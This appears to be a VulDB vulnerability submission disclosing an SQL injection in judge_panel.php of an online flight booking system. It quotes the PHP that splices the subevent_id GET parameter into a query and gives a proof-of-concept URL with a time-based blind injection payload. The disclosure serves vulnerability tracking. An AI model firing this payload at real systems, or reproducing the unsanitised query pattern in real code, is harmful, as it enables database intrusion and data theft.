| Titel | Online Flight Booking Management System judge_panel.php has SQLinject. |
|---|
| Beschreibung | <?php
error_reporting(0);
include('header2.php');
include('session.php');
$judge_ctr=$_GET['judge_ctr'];
$subevent_id=$_GET['subevent_id'];
$getContestant_id=$_GET['contestant_id'];
$pageStat=$_GET['pStat'];
?>
<?php $event_query = $conn->query("select * from sub_event where subevent_id='$subevent_id'") or die(mysql_error());
while ($event_row = $event_query->fetch())
{ ?>
<?php
$se_MEidxx=$event_row['mainevent_id'];
$se_namexx=$event_row['event_name'];
$se_statusxx=$event_row['status'];
?>
Because the string entered by the user is not filtered and the sql statements are spliced, the sql injection vulnerability is generated. It can cause serious harm to the system.
poc:
http://127.0.0.1/judge_panel.php?judge_ctr=&subevent_id='and(select*from(select+sleep(2))a/**/union/**/select+1)='&contestant_id= |
|---|
| Quelle | ⚠️ https://github.com/qyhmsys/cve-list/blob/master/Online%20Flight%20Booking%20Management%20System%20judge_panel.md |
|---|
| Benutzer | wei.zhang (UID 38856) |
|---|
| Einreichung | 13.01.2023 07:45 (vor 3 Jahren) |
|---|
| Moderieren | 13.01.2023 10:18 (3 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 218276 [SourceCodester Online Flight Booking Management System judge_panel.php subevent_id SQL Injection] |
|---|
| Punkte | 20 |
|---|